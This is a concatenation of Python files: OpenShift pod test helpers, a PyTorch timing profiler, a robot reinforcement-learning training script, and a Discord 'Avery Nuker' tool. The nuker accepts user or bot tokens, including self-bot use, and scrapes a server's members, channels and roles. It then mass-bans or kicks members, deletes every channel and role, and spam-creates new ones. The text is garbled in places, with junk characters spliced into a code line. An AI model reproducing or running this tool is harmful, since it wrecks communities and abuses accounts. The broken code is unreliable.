cmd = f"oc -n {namespace} cp {os.path.expanduser(localpath)} {pod_name}:{remotepath}"
run_cmd(cmd)
def download_file_from_pod(pod_name, remotepath, localpath, namespace=None):
"""
Download a file from a pod
Args:
pod_name (str): Name of the pod
remotepath (str): Target path on the pod
localpath (str): Local file to upload
namespace (str): The namespace of the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = f"oc -n {namespace} cp {pod_name}:{remotepath} {os.path.expanduser(localpath)}"
run_cmd(cmd)
def wait_for_storage_pods(timeout=200):
"""
Check all OCS pods status, they should be in Running or Completed state
Args:
timeout (int): Number of seconds to wait for pods to get into correct
state
"""
all_pod_obj = get_all_pods(
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
for pod_obj in all_pod_obj:
state = constants.STATUS_RUNNING
if any(i in pod_obj.name for i in ['-1-deploy', 'ocs-deviceset']):
state = constants.STATUS_COMPLETED
try:
helpers.wait_for_resource_state(
resource=pod_obj,
state=state,
timeout=timeout
)
except ResourceWrongStatusException:
# 'rook-ceph-crashcollector' on the failed node stucks at
# pending state. BZ 1810014 tracks it.
# Ignoring 'rook-ceph-crashcollector' pod health check as
# WA and deleting its deployment so that the pod
# disappears. Will revert this WA once the BZ is fixed
if 'rook-ceph-crashcollector' in pod_obj.name:
ocp_obj = ocp.OCP(
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
pod_name = pod_obj.name
deployment_name = '-'.join(pod_name.split("-")[:-2])
command = f"delete deployment {deployment_name}"
ocp_obj.exec_oc_cmd(command=command)
logger.info(f"Deleted deployment for pod {pod_obj.name}")
else:
raise
def verify_pods_upgraded(old_images, selector, count=1, timeout=720):
"""
Verify that all pods do not have old image.
Args:
old_images (set): Set with old images.
selector (str): Selector (e.g. app=ocs-osd)
count (int): Number of resources for selector.
timeout (int): Timeout in seconds to wait for pods to be upgraded.
Raises:
TimeoutException: If the pods didn't get upgraded till the timeout.
"""
namespace = config.ENV_DATA['cluster_namespace']
pod = OCP(
kind=constants.POD, namespace=namespace,
)
info_message = (
f"Waiting for {count} pods with selector: {selector} to be running "
f"and upgraded."
)
logger.info(info_message)
start_time = time.time()
selector_label, selector_value = selector.split('=')
while True:
pod_count = 0
try:
pods = get_all_pods(namespace, [selector_value], selector_label)
pods_len = len(pods)
logger.info(f"Found {pods_len} pod(s) for selector: {selector}")
if pods_len != count:
logger.warning(
f"Number of found pods {pods_len} is not as expected: "
f"{count}"
)
for pod in pods:
verify_images_upgraded(old_images, pod.get())
pod_count += 1
except CommandFailed as ex:
logger.warning(
f"Failed when getting pods with selector {selector}."
f"Error: {ex}"
)
except NonUpgradedImagesFoundError as ex:
logger.warning(ex)
check_timeout_reached(start_time, timeout, info_message)
if pods_len != count:
logger.error(f"Found pods: {pods_len} but expected: {count}!")
elif pod_count == count:
return
def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None):
"""
Fetches info about noobaa pods in the cluster
Args:
noobaa_label (str): label associated with osd pods
(default: defaults.NOOBAA_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of noobaa pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
noobaas = get_pods_having_label(noobaa_label, namespace)
noobaa_pods = [Pod(**noobaa) for noobaa in noobaas]
return noobaa_pods
def wait_for_dc_app_pods_to_reach_running_state(
dc_pod_obj, timeout=120, exclude_state=None
):
"""
Wait for DC app pods to reach running state
Args:
dc_pod_obj (list): list of dc app pod objects
timeout (int): Timeout in seconds to wait for pods to be in Running
state.
exclude_state (str): A resource state to ignore
"""
for pod_obj in dc_pod_obj:
name = pod_obj.get_labels().get('name')
dpod_list = get_all_pods(selector_label=f"name={name}", wait=True)
for dpod in dpod_list:
if '-1-deploy' not in dpod.name and dpod.status != exclude_state:
helpers.wait_for_resource_state(
dpod, constants.STATUS_RUNNING, timeout=timeout
)
def delete_deploymentconfig_pods(pod_obj):
"""
Delete a DeploymentConfig pod and all the pods that are controlled by it
Args:
pod_obj (Pod): Pod object
"""
dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
pod_data_list = dc_ocp_obj.get().get('items')
if pod_data_list:
for pod_data in pod_data_list:
if pod_obj.get_labels().get('name') == pod_data.get('metadata').get('name'):
dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get('name'))
dc_ocp_obj.wait_for_delete(
resource_name=pod_obj.get_labels().get('name')
)
def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before):
status_options = ['Init:1/4', 'Init:2/4', 'Init:3/4', 'PodInitializing', 'Running']
try:
for osd_pods in TimeoutSampler(
timeout=180, sleep=3, func=get_osd_pods
):
# Check if the new osd pods has started to come up
new_osd_pods = osd_pods[number_of_osd_pods_before:]
new_osd_pods_come_up = [pod.status() in status_options for pod in new_osd_pods]
if any(new_osd_pods_come_up):
logging.info("One or more of the new osd pods has started to come up")
break
except TimeoutExpiredError:
logging.warning(
"None of the new osd pods reached the desired status"
)
def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Gets the dictionary of pod and its restart count for all the pods in a given namespace
Returns:
dict: dictionary of pod name and its corresponding restart count
"""
list_of_pods = get_all_pods(namespace)
restart_dict = {}
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added.
if "rook-ceph-osd-prepare" not in p.name and "rook-ceph-drain-canary" not in p.name:
restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, 'RESTARTS'))
logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}")
return restart_dict
def check_pods_in_running_state(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
checks whether all the pods in a given namespace are in Running state or not
Returns:
Boolean: True, if all pods in Running state. False, otherwise
"""
ret_val = True
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added.
if "rook-ceph-osd-prepare" not in p.name and "rook-ceph-drain-canary" not in p.name:
status = ocp_pod_obj.get_resource(p.name, 'STATUS')
if status not in "Running":
logging.error(f"The pod {p.name} is in {status} state. Expected = Running")
ret_val = False
return ret_val
|
_time_summary.py
|
# mypy: ignore-errors
import atexit
from contextlib import contextmanager
import os
import time
from typing import Callable, Dict, Generator, Optional, Tuple
import threading
import queue
import multiprocessing as mp
import torch
import weakref
from pytorch_pfn_extras.reporting import DictSummary
Events = Tuple[torch.cuda.Event, torch.cuda.Event]
class _ReportNotification:
def __init__(self, summary, tag, use_cuda, begin_event, begin):
self._is_completed = True
self._summary = summary
self._tag = tag
self._use_cuda = use_cuda
self._begin_event = begin_event
self._begin = begin
def defer(self) -> None:
self._is_completed = False
def complete(self) -> None:
self._summary.complete_report(
self._tag, self._use_cuda, self._begin_event, self._begin)
class _CPUWorker:
def __init__(
self,
add: Callable[[str, float], None],
max_queue_size: int,
) -> None:
self._add = add
self._max_queue_size = max_queue_size
self._initialized = False
self._queue: Optional[mp.JoinableQueue[Optional[Tuple[str, float]]]] = None
self._thread: Optional[threading.Thread] = None
def initialize(self) -> None:
if self._initialized:
return
self._queue = mp.JoinableQueue(self._max_queue_size)
self._thread = threading.Thread(target=self._worker, daemon=True)
self._thread.start()
self._initialized = True
def finalize(self) -> None:
if not self._initialized:
return
assert self._queue is not None
assert self._thread is not None
self._queue.put(None)
self._queue.join()
self._queue.close()
self._queue.join_thread()
self._thread.join()
self._initialized = False
def synchronize(self) -> None:
assert self._queue is not None
self._queue.join()
def put(self, name: str, value: float) -> None:
assert self._queue is not None
self._queue.put((name, value))
def _worker(self) -> None:
assert self._queue is not None
while True:
v = self._queue.get()
if v is None:
self._queue.task_done()
break
name, value = v
self._add(name, value)
self._queue.task_done()
_QueueElem = Tuple[str, Tuple[torch.cuda.Event, torch.cuda.Event]]
class _CUDAWorker:
def __init__(
self,
add: Callable[[str, float], None],
max_queue_size: int,
) -> None:
self._add = add
self._max_queue_size = max_queue_size
self._initialized = False
self._thread: Optional[threading.Thread] = None
self._queue: Optional['queue.Queue[Optional[_QueueElem]]'] = None
self._event_lock = threading.Lock()
self._events: Optional['queue.Queue[torch.cuda.Event]'] = None
def initialize(self) -> None:
if self._initialized:
return
self._queue = queue.Queue(self._max_queue_size)
self._events = queue.Queue(self._max_queue_size * 2)
self._thread = threading.Thread(target=self._worker, daemon=True)
self._thread.start()
self._initialized = True
def finalize(self) -> None:
if not self._initialized:
return
assert self._queue is not None
assert self._thread is not None
self._queue.put(None)
self._queue.join()
self._thread.join()
self._initialized = False
def synchronize(self) -> None:
assert self._queue is not None
self._queue.join()
def put(
self,
name: str,
events: Tuple[torch.cuda.Event, torch.cuda.Event],
) -> None:
assert self._queue is not None
self._queue.put((name, events))
def _worker(self) -> None:
assert self._queue is not None
assert self._events is not None
while True:
v = self._queue.get()
if v is None:
self._queue.task_done()
break
name, (begin, end) = v
end.synchronize() # type: ignore[no-untyped-call]
t_ms = begin.elapsed_time(end) # type: ignore[no-untyped-call]
self._add(name, t_ms / 1000)
with self._event_lock:
self._events.put(begin)
self._events.put(end)
self._queue.task_done()
def get_cuda_event(self) -> torch.cuda.Event:
assert self._initialized
assert self._events is not None
with self._event_lock:
if self._events.empty():
event = torch.cuda.Event( # type: ignore[no-untyped-call]
enable_timing=True)
self._events.put(event)
return self._events.get()
class _Finalizer:
def __init__(self, ts: 'TimeSummary') -> None:
self._ts = weakref.ref(ts)
def __call__(self) -> None:
ts = self._ts()
if ts:
ts.finalize()
class TimeSummary:
"""Online summarization of execution times.
`TimeSummary` computes the average and standard deviation of exeuction
times in both cpu and gpu devices.
Args:
max_queue_size (int): Length limit of the internal queues that keep
reported time info until they are summarized.
auto_init (bool): Whether to automatically call `initialize()`
when the instance is created.
"""
def __init__(self, *, max_queue_size: int = 1000, auto_init: bool = True) -> None:
self._summary_lock = threading.Lock()
self._summary = DictSummary()
self._additional_stats: Dict[str, float] = {}
self._cpu_worker = _CPUWorker(self._add_from_worker, max_queue_size)
self._cuda_worker: Optional[_CUDAWorker] = None
if torch.cuda.is_available():
self._cuda_worker = _CUDAWorker(self._add_from_worker, max_queue_size)
self._initialized = False
self._master_pid = os.getpid()
if auto_init:
self.initialize()
atexit.register(_Finalizer(self))
def __del__(self) -> None:
self.finalize()
def initialize(self) -> None:
"""Initializes the worker threads for TimeSummary.
Usually you do not have to call it for yourself.
However in case you directly use ``ppe.time_summary`` outside of
:class:`pytorch_pfn_extras.training.extensions.ProfileReport`,
you have to explicitly call ``initialize()`` in advance.
"""
if self._initialized:
return
if os.getpid() != self._master_pid:
raise RuntimeError(
"TimeSummary must be initialized in the same process as the "
"one created the instance. Please call initialize() in the "
"main process.")
self._cpu_worker.initialize()
if self._cuda_worker is not None:
self._cuda_worker.initialize()
self._initialized = True
def finalize(self) -> None:
if not self._initialized:
return
self._cpu_worker.finalize()
if self._cuda_worker is not None:
self._cuda_worker.finalize()
self._initialized = False
def synchronize(self) -> None:
self.initialize()
self._cpu_worker.synchronize()
if self._cuda_worker is not None:
self._cuda_worker.synchronize()
def _add_from_worker(self, name: str, value: float) -> None:
assert self._initialized
with self._summary_lock:
self._summary.add({name: value})
min_value = self._additional_stats.get(f"{name}.min", value)
self._additional_stats[f"{name}.min"] = min(value, min_value)
max_value = self._additional_stats.get(f"{name}.max", value)
self._additional_stats[f"{name}.max"] = max(value, max_value)
def add(self, name: str, value: float) -> None:
self._add_from_worker(name, value)
@contextmanager
def summary(
self,
clear: bool = False,
) -> Generator[Tuple[DictSummary, Dict[str, float]], None, None]:
self.initialize()
try:
with self._summary_lock:
yield self._summary, self._additional_stats
finally:
if clear:
self._summary = DictSummary()
self._additional_stats = {}
def complete_report(self, tag, use_cuda, begin_event, begin):
end = time.time()
self._cpu_worker._queue.put((tag, end - begin))
if use_cuda:
end_event = self._cuda_worker.get_cuda_event()
end_event.record()
self._cuda_worker._queue.put(
(f"{tag}.cuda", (begin_event, end_event)))
@contextmanager
def report(
self,
tag: str,
use_cuda: bool = False,
) -> Generator[_ReportNotification, None, None]:
"""Context manager to automatically report execution times.
The start and completion times are obtained automatically,
the user only needs to provide a tag to identify the value
in the summary values.
Args:
tag (str): A name to identify the section of code being profiled.
use_cuda (bool): Indicates if GPU time should also be profiled.
"""
self.initialize()
begin_event = None
if use_cuda:
assert self._cuda_worker is not None
begin_event = self._cuda_worker.get_cuda_event()
begin_event.record() # type: ignore[no-untyped-call]
try:
begin = time.time()
notification = _ReportNotification(
self, tag, use_cuda, begin_event, begin)
yield notification
finally:
if notification._is_completed:
self.complete_report(tag, use_cuda, begin_event, begin)
_thread_local = threading.local()
def get_time_summary() -> TimeSummary:
if not hasattr(_thread_local, 'time_summary'):
_thread_local.time_summary = TimeSummary(auto_init=False)
return _thread_local.time_summary
|
train_dppo2_mlp.py
|
import os
import sys
import time
from datetime import datetime
import gym
import gym_gazebo2
import tensorflow as tf
import multiprocessing
import threading
from importlib import import_module
from baselines import bench, logger
from baselines.ppo2 import ppo2
from baselines.common.vec_env.dummy_vec_env import DummyVecEnv
ncpu = multiprocessing.cpu_count()
if sys.platform == 'darwin':
ncpu //= 2
config = tf.ConfigProto(allow_soft_placement=True,
intra_op_parallelism_threads=ncpu,
inter_op_parallelism_threads=ncpu,
log_device_placement=False)
config.gpu_options.allow_growth = True
tf.Session(config=config).__enter__()
def get_alg_module(alg, submodule=None):
submodule = submodule or alg
try:
# first try to imptrain_ppo2_mlp.pyort the alg module from baselines
alg_module = import_module('.'.join(['baselines', alg, submodule]))
except ImportError:
# then from rl_algs
alg_module = import_module('.'.join(['rl_' + 'algs', alg, submodule]))
return alg_module
def get_learn_function(alg, submodule=None):
return get_alg_module(alg, submodule).learn
def get_learn_function_defaults(alg, env_type):
try:
alg_defaults = get_alg_module(alg, 'defaults')
kwargs = getattr(alg_defaults, env_type)()
except (ImportError, AttributeError):
kwargs = {}
return kwargs
leg_name = ""
def make_env_limb():
env = gym.make('PhantomXLeg-v0')
env.set_info(main_env.info)
# env.set_episode_size(alg_kwargs['nsteps'])
env.leg_name = leg_name
os.makedirs(logger.get_dir() + "/" + leg_name, exist_ok=True)
env = bench.Monitor(env, logger.get_dir() + "/" + leg_name + "/log" and os.path.join(logger.get_dir() + "/" + leg_name + "/log"),
allow_early_resets=True)
return env
# Get dictionary from baselines/ppo2/defaults
env_type = 'phantomx_mlp'
alg_kwargs = get_learn_function_defaults('ppo2', env_type)
# Create needed folders
timedate = datetime.now().strftime('%Y-%m-%d_%Hh%Mmin')
logdir = '/tmp/ros2learn/' + alg_kwargs['env_name'] + '/dppo2_mlp/' + timedate
# Generate tensorboard file
format_strs = os.getenv('MARA_LOG_FORMAT', 'stdout,log,csv,tensorboard').split(',')
logger.configure(os.path.abspath(logdir), format_strs)
with open(logger.get_dir() + "/parameters.txt", 'w') as out:
out.write(
'num_layers = ' + str(alg_kwargs['num_layers']) + '\n'
+ 'num_hidden = ' + str(alg_kwargs['num_hidden']) + '\n'
+ 'layer_norm = ' + str(alg_kwargs['layer_norm']) + '\n'
+ 'nsteps = ' + str(alg_kwargs['nsteps']) + '\n'
+ 'nminibatches = ' + str(alg_kwargs['nminibatches']) + '\n'
+ 'lam = ' + str(alg_kwargs['lam']) + '\n'
+ 'gamma = ' + str(alg_kwargs['gamma']) + '\n'
+ 'noptepochs = ' + str(alg_kwargs['noptepochs']) + '\n'
+ 'log_interval = ' + str(alg_kwargs['log_interval']) + '\n'
+ 'ent_coef = ' + str(alg_kwargs['ent_coef']) + '\n'
+ 'cliprange = ' + str(alg_kwargs['cliprange']) + '\n'
+ 'vf_coef = ' + str(alg_kwargs['vf_coef']) + '\n'
+ 'max_grad_norm = ' + str(alg_kwargs['max_grad_norm']) + '\n'
+ 'seed = ' + str(alg_kwargs['seed']) + '\n'
+ 'value_network = ' + alg_kwargs['value_network'] + '\n'
+ 'network = ' + alg_kwargs['network'] + '\n'
+ 'total_timesteps = ' + str(alg_kwargs['total_timesteps']) + '\n'
+ 'save_interval = ' + str(alg_kwargs['save_interval']) + '\n'
+ 'env_name = ' + alg_kwargs['env_name'] + '\n'
+ 'transfer_path = ' + str(alg_kwargs['transfer_path']) )
main_env = gym.make('PhantomX-v0')
# main_env.set_episode_size(alg_kwargs['nsteps'])
# main_env = bench.Monitor(main_env, logger.get_dir() and os.path.join(logger.get_dir()), allow_early_resets=True)
# left_env = DummyVecEnv([make_env_left])
# right_env = DummyVecEnv([make_env_right])
leg_envs = {}
learners = {}
legs = ['lf', 'lm', 'lr', 'rf', 'rm', 'rr']
for leg in legs:
leg_name = leg
leg_envs[leg] = DummyVecEnv([make_env_limb])
learners[leg] = get_learn_function('ppo2')
transfer_path = alg_kwargs['transfer_path']
# Remove unused parameters for training
alg_kwargs.pop('env_name')
alg_kwargs.pop('trained_path')
alg_kwargs.pop('transfer_path')
if transfer_path is not None:
# Do transfer learning
# learn(env=left_env, load_path=transfer_path, **alg_kwargs)
pass
else:
threads = []
print("starting threads")
for idx, leg in enumerate(legs):
alg_kwargs['seed'] = idx
threads.append(threading.Thread(target=learners[leg], kwargs=dict(env=leg_envs[leg], **alg_kwargs)))
for thread in threads:
thread.start()
# l_thread = threading.Thread(target=learn, kwargs=dict(env=left_env, **alg_kwargs))
# r_thread = threading.Thread(target=learn, kwargs=dict(env=right_env, **alg_kwargs))
# l_thread.start()
# r_thread.start()
print("threads started")
while True:
main_env.info.execute_action()
main_env.info.execute_reset()
time.sleep(1/1000)
|
ROMEOavery.py
|
import requests
import os
import sys
import threading
import time
import json
import asyncio
import discord
import aiohttp
from pypresence import Presence
from discord import Webhook, AsyncWebhookAdapter
from discord.ext import commands
os.system(f'cls & mode 85,20 & title [Avery Nuker] - Configuration')
token = input(f'\x1b[38;5;56m> \033[37mToken\x1b[38;5;56m: \033[37m')
rich_presence = input(f'\x1b[38;5;56m> \033[37mRich Presence (\x1b[38;5;56mY\033[37m/\x1b[38;5;56mN\033[37m)\x1b[38;5;56m: \033[37m')
os.system('cls')
def check_token():
if requests.get("https://discord.com/api/v8/users/@me", headers={"Authorization": f'{token}'}).status_code == 200:
return "user"
else:
return "bot"
def RichPresence():
if rich_presence == "y" or rich_presence == "Y":
try:
RPC = Presence("816053514584195073")
RPC.connect()
RPC.update(details="Connected", large_image="averylarge2", small_image="avery", large_text="github.com/skeqt/AveryNuker", start=time.time())
except:
pass
rich_presence = RichPresence()
token_type = check_token()
intents = discord.Intents.all()
intents.members = True
if token_type == "user":fvsevfradieq0 agtswFODMNV WOVWKDO0
headers = {'Authorization': f'{token}'}
client = commands.Bot(command_prefix=">", case_insensitive=False, self_bot=True, intents=intents)
elif token_type == "bot":
headers = {'Authorization': f'Bot {token}'}
client = commands.Bot(command_prefix=">", case_insensitive=False, intents=intents)
client.remove_command("help")
class Avery:
def __init__(self):
self.colour = '\x1b[38;5;56m'
def BanMembers(self, guild, member):
while True:
r = requests.put(f"https://discord.com/api/v8/guilds/{guild}/bans/{member}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Banned{self.colour} {member.strip()}\033[37m")
break
else:
break
def KickMembers(self, guild, member):
while True:
r = requests.delete(f"https://discord.com/api/v8/guilds/{guild}/members/{member}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Kicked{self.colour} {member.strip()}\033[37m")
break
else:
break
def DeleteChannels(self, guild, channel):
while True:
r = requests.delete(f"https://discord.com/api/v8/channels/{channel}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Deleted Channel {self.colour}{channel.strip()}\033[37m")
break
else:
break
def DeleteRoles(self, guild, role):
while True:
r = requests.delete(f"https://discord.com/api/v8/guilds/{guild}/roles/{role}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Deleted Role{self.colour} {role.strip()}\033[37m")
break
else:
break
def SpamChannels(self, guild, name):
while True:
json = {'name': name, 'type': 0}
r = requests.post(f'https://discord.com/api/v8/guilds/{guild}/channels', headers=headers, json=json)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Created Channel{self.colour} {name}\033[37m")
break
else:
break
def SpamRoles(self, guild, name):
while True:
json = {'name': name}
r = requests.post(f'https://discord.com/api/v8/guilds/{guild}/roles', headers=headers, json=json)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{self.colour}[\033[37m+{self.colour}]\033[37m Created Role{self.colour} {name}\033[37m")
break
else:
break
async def Scrape(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
await client.wait_until_ready()
guildOBJ = client.get_guild(int(guild))
members = await guildOBJ.chunk()
try:
os.remove("Scraped/members.txt")
os.remove("Scraped/channels.txt")
os.remove("Scraped/roles.txt")
except:
pass
membercount = 0
with open('Scraped/members.txt', 'a') as m:
for member in members:
m.write(str(member.id) + "\n")
membercount += 1
print(f"\n{self.colour}[\033[37m!{self.colour}]\033[37m Scraped {self.colour}{membercount}\033[37m Members")
m.close()
channelcount = 0
with open('Scraped/channels.txt', 'a') as c:
for channel in guildOBJ.channels:
c.write(str(channel.id) + "\n")
channelcount += 1
print(f"{self.colour}[\033[37m!{self.colour}]\033[37m Scraped {self.colour}{channelcount}\033[37m Channels")
c.close()
rolecount = 0
with open('Scraped/roles.txt', 'a') as r:
for role in guildOBJ.roles:
r.write(str(role.id) + "\n")
rolecount += 1
print(f"{self.colour}[\033[37m!{self.colour}]\033[37m Scraped {self.colour}{rolecount}\033[37m Roles")
r.close()
async def NukeExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
channel_name = input(f"{self.colour}> \033[37mChannel Names{self.colour}: \033[37m")
channel_amount = input(f"{self.colour}> \033[37mChannel Amount{self.colour}: \033[37m")
role_name = input(f"{self.colour}> \033[37mRole Names{self.colour}: \033[37m")
role_amount = input(f"{self.colour}> \033[37mRole Amount{self.colour}: \033[37m")
print()
members = open('Scraped/members.txt')
channels = open('Scraped/channels.txt')
roles = open('Scraped/roles.txt')
for member in members:
threading.Thread(target=self.BanMembers, args=(guild, member,)).start()
for channel in channels:
threading.Thread(target=self.DeleteChannels, args=(guild, channel,)).start()
for role in roles:
threading.Thread(target=self.DeleteRoles, args=(guild, role,)).start()
for i in range(int(channel_amount)):
threading.Thread(target=self.SpamChannels, args=(guild, channel_name,)).start()
for i in range(int(role_amount)):
threading.Thread(target=self.SpamRoles, args=(guild, role_name,)).start()
members.close()
channels.close()
roles.close()
async def BanExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
members = open('Scraped/members.txt')
for member in members:
threading.Thread(target=self.BanMembers, args=(guild, member,)).start()
members.close()
async def KickExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
members = open('Scraped/members.txt')
for member in members:
threading.Thread(target=self.KickMembers, args=(guild, member,)).start()
members.close()
async def ChannelDeleteExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
channels = open('Scraped/channels.txt')
for channel in channels:
threading.Thread(target=self.DeleteChannels, args=(guild, channel,)).start()
channels.close()
async def RoleDeleteExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
roles = open('Scraped/roles.txt')
for role in roles:
threading.Thread(target=self.DeleteRoles, args=(guild, role,)).start()
roles.close()
async def ChannelSpamExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
name = input(f"{self.colour}> \033[37mChannel Names{self.colour}: \033[37m")
amount = input(f"{self.colour}> \033[37mAmount{self.colour}: \033[37m")
print()
for i in range(int(amount)):
threading.Thread(target=self.SpamChannels, args=(guild, name,)).start()
async def RoleSpamExecute(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
name = input(f"{self.colour}> \033[37mRole Names{self.colour}: \033[37m")
amount = input(f"{self.colour}> \033[37mAmount{self.colour}: \033[37m")
print()
for i in range(int(amount)):
threading.Thread(target=self.SpamRoles, args=(guild, name,)).start()
async def PruneMembers(self):
guild = input(f'{self.colour}> \033[37mGuild ID{self.colour}: \033[37m')
print()
await guild.prune_members(days=1, compute_prune_count=False, roles=guild.roles)
def Credits(self):
os.system(f'cls & mode 85,20 & title [Avery Nuker] - Credits')
print(f'''
{self.colour}╔═╗╦ ╦╔═╗╦═╗╦ ╦ ╔╗╔╦ ╦╦╔═╔═╗╦═╗
\033[90m╠═╣╚╗╔╝║╣ ╠╦╝╚╦╝ ║║║║ ║╠╩╗║╣ ╠╦╝
\033[37m╩ ╩ ╚╝ ╚═╝╩╚═ ╩ ╝╚╝╚═╝╩ ╩╚═╝╩╚═
{self.colour}[\033[37mDiscord{self.colour}] \033[37mskeet#1000
{self.colour}[\033[37mGithub{self.colour}] \033[37mskeqt
\033[37m''')
async def ThemeChanger(self):
os.system(f'cls & mode 85,20 & title [Avery Nuker] - Themes')
print(f'''
{self.colour}╔═╗╦ ╦╔═╗╦═╗╦ ╦ ╔╗╔╦ ╦╦╔═╔═╗╦═╗
\033[90m╠═╣╚╗╔╝║╣ ╠╦╝╚╦╝ ║║║║ ║╠╩╗║╣ ╠╦╝
\033[37m╩ ╩ ╚╝ ╚═╝╩╚═ ╩ ╝╚╝╚═╝╩ ╩╚═╝╩╚═
{self.colour}╔═══════════════════════╦═══════════════════════╦═══════════════════════╗\033[37m
{self.colour}║ \033[37m[{self.colour}1\033[37m] \033[37mRed {self.colour}║\033[37m [{self.colour}5\033[37m] \033[37mPurple {self.colour}║\033[37m [{self.colour}9\033[37m] \033[37mGrey {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}2\033[37m] \033[37mGreen {self.colour}║\033[37m [{self.colour}6\033[37m] \033[37mBlue {self.colour}║\033[37m [{self.colour}0\033[37m] \033[37mPeach {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}3\033[37m] \033[37mYellow {self.colour}║\033[37m [{self.colour}7\033[37m] \033[37mPink {self.colour}║\033[37m [{self.colour}M\033[37m] \033[37mMenu {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}4\033[37m] \033[37mOrange {self.colour}║\033[37m [{self.colour}8\033[37m] \033[37mCyan {self.colour}║\033[37m [{self.colour}X\033[37m] \033[37mExit {self.colour}║\033[37m
{self.colour}╚═══════════════════════╩═══════════════════════╩═══════════════════════╝\033[37m
\033[37m''')
choice = input(f'{self.colour}> \033[37mChoice{self.colour}: \033[37m')
if choice == '1':
self.colour = '\x1b[38;5;196m'
await self.ThemeChanger()
elif choice == '2':
self.colour = '\x1b[38;5;34m'
await self.ThemeChanger()
elif choice == '3':
self.colour = '\x1b[38;5;142m'
await self.ThemeChanger()
elif choice == '4':
self.colour = '\x1b[38;5;172m'
await self.ThemeChanger()
elif choice == '5':
self.colour = '\x1b[38;5;56m'
await self.ThemeChanger()
elif choice == '6':
self.colour = '\x1b[38;5;21m'
await self.ThemeChanger()
elif choice == '7':
self.colour = '\x1b[38;5;201m'
await self.ThemeChanger()
elif choice == '8':
self.colour = '\x1b[38;5;51m'
await self.ThemeChanger()
elif choice == '9':
self.colour = '\x1b[38;5;103m'
await self.ThemeChanger()
elif choice == '0':
self.colour = '\x1b[38;5;209m'
await self.ThemeChanger()
elif choice == 'M' or choice == 'm':
await self.Menu()
elif choice == 'X' or choice == 'x':
os._exit(0)
async def Menu(self):
os.system(f'cls & mode 85,20 & title [Avery Nuker] - Connected: {client.user}')
print(f'''
{self.colour}╔═╗╦ ╦╔═╗╦═╗╦ ╦ ╔╗╔╦ ╦╦╔═╔═╗╦═╗
\033[90m╠═╣╚╗╔╝║╣ ╠╦╝╚╦╝ ║║║║ ║╠╩╗║╣ ╠╦╝
\033[37m╩ ╩ ╚╝ ╚═╝╩╚═ ╩ ╝╚╝╚═╝╩ ╩╚═╝╩╚═
{self.colour}╔═══════════════════════╦═══════════════════════╦═══════════════════════╗\033[37m
{self.colour}║ \033[37m[{self.colour}1\033[37m] \033[37mBan Members {self.colour}║\033[37m [{self.colour}5\033[37m] \033[37mDelete Channels {self.colour}║\033[37m [{self.colour}9\033[37m] \033[37mScrape Info {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}2\033[37m] \033[37mKick Members {self.colour}║\033[37m [{self.colour}6\033[37m] \033[37mCreate Roles {self.colour}║\033[37m [{self.colour}0\033[37m] \033[37mChange Themes {self.colour}║\033[37m
{self.colour}║ \033[37m[{self.colour}3\033[37m] \033[37mPrune Members {self.colour}║\033[37m [{self.colour}7\033[37m] \033[37mCreate Channels {self.colour}║\033[37m [{self.colour}C\033[37m] \033[37mView Credits {self.colour}║\033[37m
